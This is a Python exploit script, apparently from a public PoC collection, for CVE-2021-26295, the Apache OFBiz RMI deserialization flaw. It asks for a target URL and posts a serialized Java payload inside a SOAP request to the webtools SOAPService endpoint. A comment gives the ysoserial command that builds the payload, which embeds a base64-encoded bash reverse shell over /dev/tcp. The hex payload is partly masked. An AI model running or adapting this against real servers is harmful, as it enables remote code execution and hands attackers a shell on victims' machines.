Apache OFBiz rmi反序列化漏洞 CVE-2021-26295 shell.py
2.44 KB / 2021-07-04 06:01:08
import requests
import sys
import sys
import subprocess
import binascii
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: Apache OFBiz \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+ \033[36mHex_data >>> 在文件中修改 \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
# java -jar ysoserial.jar ROME "bash -c {echo,YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvLyA8JjEn}|{base64,-d}|{bash,-i}" | xxd|cut -f 2,3,4,5,6,7,8,9 -d " "|tr -d ' '|tr -d '\n'
hex_data = "aced000570034c000e5b4c0xxxxxxxxxxxxxxxxxxxxxxxxxe000671007e000678"
headers = {
'Content-Type': 'text/xml'
}
post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><peiqi:clearAllEntityCaches xmlns:peiqi="http://ofbiz.apache.org/service/"><peiqi:cus-obj>%s</peiqi:cus-obj></peiqi:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_data
vuln_url = target_url + "/webtools/control/SOAPService"
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=post_data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/webtools/control/SOAPService..... \033[0m".format(target_url))
if response.status_code == 200:
print("\033[36m[o] 请检查 监听地址 响应\n \033[0m")
else:
print("\033[31m[x] 请求失败 \033[0m")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m")
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)